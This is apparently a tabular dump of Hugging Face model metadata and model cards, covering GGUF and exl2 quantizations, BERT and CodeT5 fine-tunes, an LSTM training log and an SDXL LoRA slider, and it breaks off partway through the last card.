modelId
stringlengths 5
139
| author
stringlengths 2
42
| last_modified
timestamp[us, tz=UTC]date 2020-02-15 11:33:14
2025-06-02 00:43:14
| downloads
int64 0
223M
| likes
int64 0
11.7k
| library_name
stringclasses 461
values | tags
sequencelengths 1
4.05k
| pipeline_tag
stringclasses 54
values | createdAt
timestamp[us, tz=UTC]date 2022-03-02 23:29:04
2025-06-02 00:42:27
| card
stringlengths 11
1.01M
|
---|---|---|---|---|---|---|---|---|---|
s3nh/Gorgon-7b-v0.1-GGUF | s3nh | 2024-01-22T08:10:33Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"text-generation",
"zh",
"en",
"license:openrail",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T07:01:11Z |
---
license: openrail
pipeline_tag: text-generation
library_name: transformers
language:
- zh
- en
---
## Original model card
Buy me a coffee if you like this project ;)
<a href="https://www.buymeacoffee.com/s3nh"><img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" alt=""></a>
#### Description
GGUF Format model files for [This project](https://huggingface.co/openerotica/Gorgon-7b-v0.1).
### GGUF Specs
GGUF is a format based on the existing GGJT, but makes a few changes to the format to make it more extensible and easier to use. The following features are desired:
Single-file deployment: they can be easily distributed and loaded, and do not require any external files for additional information.
Extensible: new features can be added to GGML-based executors/new information can be added to GGUF models without breaking compatibility with existing models.
mmap compatibility: models can be loaded using mmap for fast loading and saving.
Easy to use: models can be easily loaded and saved using a small amount of code, with no need for external libraries, regardless of the language used.
Full information: all information needed to load a model is contained in the model file, and no additional information needs to be provided by the user.
The key difference between GGJT and GGUF is the use of a key-value structure for the hyperparameters (now referred to as metadata), rather than a list of untyped values.
This allows for new metadata to be added without breaking compatibility with existing models, and to annotate the model with additional information that may be useful for
inference or for identifying the model.
### inference
User: Tell me story about what is an quantization and what do we need to build.
{{user}}: So, the first thing that you need to know about an quiz, or a test for that matter, is that there are two types of questions; one-way and two-way. A one way question is like this: "Does the sun shine?" A two way question is like this: "What is your favorite color? Is it red, blue, or green?"
The main difference is that a two-way question has more possible answers than a one-way question does. Now, when you build an quiz, you have to make sure that the questions are in order of
# Original model card
|
s3nh/mistral-7b-lamia-v0.1-GGUF | s3nh | 2024-01-22T08:10:22Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"text-generation",
"zh",
"en",
"license:openrail",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2024-01-22T06:57:19Z |
---
license: openrail
pipeline_tag: text-generation
library_name: transformers
language:
- zh
- en
---
## Original model card
Buy me a coffee if you like this project ;)
<a href="https://www.buymeacoffee.com/s3nh"><img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" alt=""></a>
#### Description
GGUF Format model files for [This project](https://huggingface.co/openerotica/mistral-7b-lamia-v0.1).
### GGUF Specs
GGUF is a format based on the existing GGJT, but makes a few changes to the format to make it more extensible and easier to use. The following features are desired:
Single-file deployment: they can be easily distributed and loaded, and do not require any external files for additional information.
Extensible: new features can be added to GGML-based executors/new information can be added to GGUF models without breaking compatibility with existing models.
mmap compatibility: models can be loaded using mmap for fast loading and saving.
Easy to use: models can be easily loaded and saved using a small amount of code, with no need for external libraries, regardless of the language used.
Full information: all information needed to load a model is contained in the model file, and no additional information needs to be provided by the user.
The key difference between GGJT and GGUF is the use of a key-value structure for the hyperparameters (now referred to as metadata), rather than a list of untyped values.
This allows for new metadata to be added without breaking compatibility with existing models, and to annotate the model with additional information that may be useful for
inference or for identifying the model.
### inference
User: Tell me story about what is an quantization and what do we need to build.
# Original model card
|
Doowon96/bert-base-finetuned-ynat | Doowon96 | 2024-01-22T08:09:46Z | 10 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"ko",
"base_model:klue/bert-base",
"base_model:finetune:klue/bert-base",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-16T15:36:48Z | ---
license: cc-by-sa-4.0
base_model: klue/bert-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: bert-base-finetuned-ynat
results: []
language:
- ko
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-base-finetuned-ynat
This model is a fine-tuned version of [klue/bert-base](https://huggingface.co/klue/bert-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3745
- F1: 0.8704
## Model description
뉴스 제목을 입력하면 뉴스의 카테고리를 예측
label_map = {
'LABEL_0': 'IT/과학',
'LABEL_1': '경제',
'LABEL_2': '사회',
'LABEL_3': '생활문화',
'LABEL_4': '세계',
'LABEL_5': '스포츠',
'LABEL_6': '정치'
}
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 256
- eval_batch_size: 256
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| No log | 1.0 | 179 | 0.3909 | 0.8655 |
| No log | 2.0 | 358 | 0.3788 | 0.8684 |
| 0.3774 | 3.0 | 537 | 0.3629 | 0.8699 |
| 0.3774 | 4.0 | 716 | 0.3776 | 0.8667 |
| 0.3774 | 5.0 | 895 | 0.3745 | 0.8704 |
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
silvercoder45/Mistral-7b-instruct-v0.2-summ-sft-dpo-e1 | silvercoder45 | 2024-01-22T08:04:33Z | 0 | 0 | null | [
"safetensors",
"license:cc-by-nc-4.0",
"region:us"
] | null | 2024-01-22T08:01:59Z | ---
license: cc-by-nc-4.0
---
Description to load and test will be added soon. More details on training and data will be added aswell.
### **Loading the Model**
Use the following Python code to load the model:
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
TBD
```
### **Generating Text**
To generate text, use the following Python code:
```python
text = "Hi, my name is "
inputs = tokenizer(text, return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
``` |
ayeshgk/codet5-small-ft-v4 | ayeshgk | 2024-01-22T07:59:05Z | 7 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:Salesforce/codet5-small",
"base_model:finetune:Salesforce/codet5-small",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T06:55:26Z | ---
license: apache-2.0
base_model: Salesforce/codet5-small
tags:
- generated_from_trainer
metrics:
- rouge
model-index:
- name: codet5-small-ft-v4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# codet5-small-ft-v4
This model is a fine-tuned version of [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4863
- Rouge1: 63.4219
- Rouge2: 52.7146
- Rougel: 62.9897
- Rougelsum: 62.9844
- Gen Len: 17.0139
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 4
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Rouge1 | Rouge2 | Rougel | Rougelsum | Gen Len |
|:-------------:|:-----:|:-----:|:---------------:|:-------:|:-------:|:-------:|:---------:|:-------:|
| 0.6991 | 1.0 | 3063 | 0.5867 | 61.4049 | 50.9933 | 60.9107 | 60.9129 | 17.1624 |
| 0.6145 | 2.0 | 6126 | 0.5189 | 62.4441 | 51.6001 | 62.0291 | 62.02 | 16.9374 |
| 0.5615 | 3.0 | 9189 | 0.4973 | 63.3391 | 52.7352 | 62.9065 | 62.9124 | 17.1099 |
| 0.5491 | 4.0 | 12252 | 0.4863 | 63.4219 | 52.7146 | 62.9897 | 62.9844 | 17.0139 |
### Framework versions
- Transformers 4.38.0.dev0
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
bartowski/FuseLLM-7B-exl2 | bartowski | 2024-01-22T07:58:54Z | 4 | 3 | transformers | [
"transformers",
"llama",
"open-llama",
"mpt",
"model-fusion",
"text-generation",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T07:44:55Z | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
tags:
- llama
- open-llama
- mpt
- model-fusion
library_name: transformers
quantized_by: bartowski
---
## Exllama v2 Quantizations of FuseLLM-7B
Using <a href="https://github.com/turboderp/exllamav2/releases/tag/v0.0.11">turboderp's ExLlamaV2 v0.0.11</a> for quantization.
# The "main" branch only contains the measurement.json, download one of the other branches for the model (see below)
Each branch contains an individual bits per weight, with the main one containing only the meaurement.json for further conversions.
Original model: https://huggingface.co/Wanfq/FuseLLM-7B
No GQA - VRAM requirements will be higher
| Branch | Bits | lm_head bits | Size (4k) | Size (16k) | Description |
| -------------------------------------------------------------- | ---- | ------------ | --------- | ---------- | ----------- |
| [8_0](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/8_0) | 8.0 | 8.0 | 9.4 GB | 15.6 GB | Maximum quality that ExLlamaV2 can produce, near unquantized performance. |
| [6_5](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/6_5) | 6.5 | 8.0 | 8.6 GB | 14.8 GB | Near unquantized performance at vastly reduced size, **recommended**. |
| [5_0](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/5_0) | 5.0 | 6.0 | 7.2 GB | 13.4 GB | Slightly lower quality vs 6.5, but usable on 8GB cards with 4k context. |
| [4_25](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/4_25) | 4.25 | 6.0 | 6.5 GB | 12.7 GB | GPTQ equivalent bits per weight. |
| [3_5](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/3_5) | 3.5 | 6.0 | 5.9 GB | 12.1 GB | Lower quality, not recommended. |
VRAM requirements listed for both 4k context and 16k context since without GQA the differences are massive (6.2 GB)
## Download instructions
With git:
```shell
git clone --single-branch --branch 6_5 https://huggingface.co/bartowski/FuseLLM-7B-exl2 FuseLLM-7B-exl2-6_5
```
With huggingface hub (credit to TheBloke for instructions):
```shell
pip3 install huggingface-hub
```
To download the `main` (only useful if you only care about measurement.json) branch to a folder called `FuseLLM-7B-exl2`:
```shell
mkdir FuseLLM-7B-exl2
huggingface-cli download bartowski/FuseLLM-7B-exl2 --local-dir FuseLLM-7B-exl2 --local-dir-use-symlinks False
```
To download from a different branch, add the `--revision` parameter:
```shell
mkdir FuseLLM-7B-exl2-6_5
huggingface-cli download bartowski/FuseLLM-7B-exl2 --revision 6_5 --local-dir FuseLLM-7B-exl2-6_5 --local-dir-use-symlinks False
```
|
CLMBR/binding-c-command-lstm-4 | CLMBR | 2024-01-22T07:50:56Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:31:45Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-c-command-lstm-4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-c-command-lstm-4
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9687
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7856 | 0.03 | 76320 | 4.7511 |
| 4.4985 | 1.03 | 152640 | 4.4704 |
| 4.3544 | 0.03 | 228960 | 4.3357 |
| 4.2708 | 1.03 | 305280 | 4.2525 |
| 4.2053 | 0.03 | 381600 | 4.1959 |
| 4.1611 | 1.03 | 457920 | 4.1555 |
| 4.1268 | 0.03 | 534240 | 4.1252 |
| 4.095 | 1.03 | 610560 | 4.1008 |
| 4.065 | 0.03 | 686880 | 4.0814 |
| 4.0414 | 1.03 | 763200 | 4.0668 |
| 4.0161 | 0.03 | 839520 | 4.0543 |
| 4.0017 | 1.03 | 915840 | 4.0434 |
| 3.9845 | 0.03 | 992160 | 4.0340 |
| 3.965 | 1.03 | 1068480 | 4.0263 |
| 3.9529 | 0.03 | 1144800 | 4.0194 |
| 3.9447 | 1.03 | 1221120 | 4.0126 |
| 3.9305 | 0.03 | 1297440 | 4.0084 |
| 3.9213 | 1.03 | 1373760 | 4.0040 |
| 3.9105 | 0.03 | 1450080 | 4.0001 |
| 3.9091 | 1.03 | 1526400 | 3.9960 |
| 3.9015 | 0.03 | 1602720 | 3.9935 |
| 3.8989 | 1.03 | 1679040 | 3.9909 |
| 3.8955 | 0.03 | 1755360 | 3.9881 |
| 3.8936 | 1.03 | 1831680 | 3.9862 |
| 3.8824 | 0.03 | 1908000 | 3.9842 |
| 3.8737 | 1.03 | 1984320 | 3.9818 |
| 3.8655 | 0.03 | 2060640 | 3.9800 |
| 3.8649 | 1.03 | 2136960 | 3.9790 |
| 3.8601 | 0.03 | 2213280 | 3.9775 |
| 3.852 | 1.03 | 2289600 | 3.9766 |
| 3.845 | 0.03 | 2365920 | 3.9753 |
| 3.8457 | 1.03 | 2442240 | 3.9744 |
| 3.8399 | 0.03 | 2518560 | 3.9734 |
| 3.8385 | 1.03 | 2594880 | 3.9727 |
| 3.8308 | 0.03 | 2671200 | 3.9718 |
| 3.8376 | 1.03 | 2747520 | 3.9709 |
| 3.8319 | 0.03 | 2823840 | 3.9702 |
| 3.8359 | 1.03 | 2900160 | 3.9696 |
| 3.8381 | 0.03 | 2976480 | 3.9691 |
| 3.8358 | 1.02 | 3052726 | 3.9687 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
bplow/halu_detect_v3 | bplow | 2024-01-22T07:40:03Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:mistralai/Mistral-7B-Instruct-v0.2",
"base_model:adapter:mistralai/Mistral-7B-Instruct-v0.2",
"region:us"
] | null | 2024-01-22T07:39:48Z | ---
library_name: peft
base_model: mistralai/Mistral-7B-Instruct-v0.2
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
satcos/LunarLander-v2.1 | satcos | 2024-01-22T07:31:29Z | 0 | 0 | null | [
"tensorboard",
"LunarLander-v2",
"ppo",
"deep-reinforcement-learning",
"reinforcement-learning",
"custom-implementation",
"deep-rl-course",
"model-index",
"region:us"
] | reinforcement-learning | 2024-01-22T07:31:20Z | ---
tags:
- LunarLander-v2
- ppo
- deep-reinforcement-learning
- reinforcement-learning
- custom-implementation
- deep-rl-course
model-index:
- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: -144.87 +/- 87.53
name: mean_reward
verified: false
---
# PPO Agent Playing LunarLander-v2
This is a trained model of a PPO agent playing LunarLander-v2.
# Hyperparameters
```python
{'exp_name': 'ppo'
'seed': 1
'torch_deterministic': True
'cuda': True
'track': False
'wandb_project_name': 'cleanRL'
'wandb_entity': None
'capture_video': False
'env_id': 'LunarLander-v2'
'total_timesteps': 50000
'learning_rate': 0.00025
'num_envs': 4
'num_steps': 128
'anneal_lr': True
'gae': True
'gamma': 0.99
'gae_lambda': 0.95
'num_minibatches': 4
'update_epochs': 4
'norm_adv': True
'clip_coef': 0.2
'clip_vloss': True
'ent_coef': 0.01
'vf_coef': 0.5
'max_grad_norm': 0.5
'target_kl': None
'repo_id': 'satcos/LunarLander-v2.1'
'batch_size': 512
'minibatch_size': 128}
```
|
ntc-ai/SDXL-LoRA-slider.terrifying | ntc-ai | 2024-01-22T07:24:26Z | 266 | 2 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion-xl",
"lora",
"template:sd-lora",
"template:sdxl-lora",
"sdxl-sliders",
"ntcai.xyz-sliders",
"concept",
"en",
"base_model:stabilityai/stable-diffusion-xl-base-1.0",
"base_model:adapter:stabilityai/stable-diffusion-xl-base-1.0",
"license:mit",
"region:us"
] | text-to-image | 2024-01-22T07:24:23Z |
---
language:
- en
thumbnail: "images/evaluate/terrifying.../terrifying_17_3.0.png"
widget:
- text: terrifying
output:
url: images/terrifying_17_3.0.png
- text: terrifying
output:
url: images/terrifying_19_3.0.png
- text: terrifying
output:
url: images/terrifying_20_3.0.png
- text: terrifying
output:
url: images/terrifying_21_3.0.png
- text: terrifying
output:
url: images/terrifying_22_3.0.png
tags:
- text-to-image
- stable-diffusion-xl
- lora
- template:sd-lora
- template:sdxl-lora
- sdxl-sliders
- ntcai.xyz-sliders
- concept
- diffusers
license: "mit"
inference: false
instance_prompt: "terrifying"
base_model: "stabilityai/stable-diffusion-xl-base-1.0"
---
# ntcai.xyz slider - terrifying (SDXL LoRA)
| Strength: -3 | Strength: 0 | Strength: 3 |
| --- | --- | --- |
| <img src="images/terrifying_17_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_17_0.0.png" width=256 height=256 /> | <img src="images/terrifying_17_3.0.png" width=256 height=256 /> |
| <img src="images/terrifying_19_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_19_0.0.png" width=256 height=256 /> | <img src="images/terrifying_19_3.0.png" width=256 height=256 /> |
| <img src="images/terrifying_20_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_20_0.0.png" width=256 height=256 /> | <img src="images/terrifying_20_3.0.png" width=256 height=256 /> |
## Download
Weights for this model are available in Safetensors format.
## Trigger words
You can apply this LoRA with trigger words for additional effect:
```
terrifying
```
## Use in diffusers
```python
from diffusers import StableDiffusionXLPipeline
from diffusers import EulerAncestralDiscreteScheduler
import torch
pipe = StableDiffusionXLPipeline.from_single_file("https://huggingface.co/martyn/sdxl-turbo-mario-merge-top-rated/blob/main/topRatedTurboxlLCM_v10.safetensors")
pipe.to("cuda")
pipe.scheduler = EulerAncestralDiscreteScheduler.from_config(pipe.scheduler.config)
# Load the LoRA
pipe.load_lora_weights('ntc-ai/SDXL-LoRA-slider.terrifying', weight_name='terrifying.safetensors', adapter_name="terrifying")
# Activate the LoRA
pipe.set_adapters(["terrifying"], adapter_weights=[2.0])
prompt = "medieval rich kingpin sitting in a tavern, terrifying"
negative_prompt = "nsfw"
width = 512
height = 512
num_inference_steps = 10
guidance_scale = 2
image = pipe(prompt, negative_prompt=negative_prompt, width=width, height=height, guidance_scale=guidance_scale, num_inference_steps=num_inference_steps).images[0]
image.save('result.png')
```
## Support the Patreon
If you like this model please consider [joining our Patreon](https://www.patreon.com/NTCAI).
By joining our Patreon, you'll gain access to an ever-growing library of over 1140+ unique and diverse LoRAs, covering a wide range of styles and genres. You'll also receive early access to new models and updates, exclusive behind-the-scenes content, and the powerful LoRA slider creator, allowing you to craft your own custom LoRAs and experiment with endless possibilities.
Your support on Patreon will allow us to continue developing and refining new models.
## Other resources
- [CivitAI](https://civitai.com/user/ntc) - Follow ntc on Civit for even more LoRAs
- [ntcai.xyz](https://ntcai.xyz) - See ntcai.xyz to find more articles and LoRAs
|
Elizezen/AINovelist-6.8B-initialized | Elizezen | 2024-01-22T07:21:08Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"gptj",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-19T05:15:14Z | AIのべりすとのパラメータ情報を元に生成しただけの未学習の状態のモデルです。つよつよGPU持ってる人ならこいつに事前学習させれば再現できるかもしれません。できないかもしれません |
eaglewatch/CBT_model_3 | eaglewatch | 2024-01-22T07:15:07Z | 90 | 0 | transformers | [
"transformers",
"pytorch",
"t5",
"text2text-generation",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T07:01:14Z | Tinnitus THI Prediction Model.
Trained with the augmentation dataset #3
license: apache-2.0
language: en
metrics:rouge
pipeline_tag: text2text-generation
tags: psychology
|
4kew/bert-finetuned-squad | 4kew | 2024-01-22T07:13:48Z | 33 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"question-answering",
"generated_from_trainer",
"base_model:google-bert/bert-base-cased",
"base_model:finetune:google-bert/bert-base-cased",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | question-answering | 2024-01-11T03:37:34Z | ---
license: apache-2.0
base_model: bert-base-cased
tags:
- generated_from_trainer
model-index:
- name: bert-finetuned-squad
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-finetuned-squad
This model is a fine-tuned version of [bert-base-cased](https://huggingface.co/bert-base-cased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
karawalla/mistral_b_karawalla_aqtraining24006 | karawalla | 2024-01-22T07:11:49Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T20:37:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
herMaster/pythia70M-finetuned-on-lamini-docs | herMaster | 2024-01-22T07:07:03Z | 17 | 0 | transformers | [
"transformers",
"pytorch",
"gpt_neox",
"text-generation",
"generated_from_trainer",
"dataset:lamini/lamini_docs",
"base_model:EleutherAI/pythia-70m",
"base_model:finetune:EleutherAI/pythia-70m",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | 2023-10-19T05:57:44Z | ---
license: apache-2.0
base_model: EleutherAI/pythia-70m
tags:
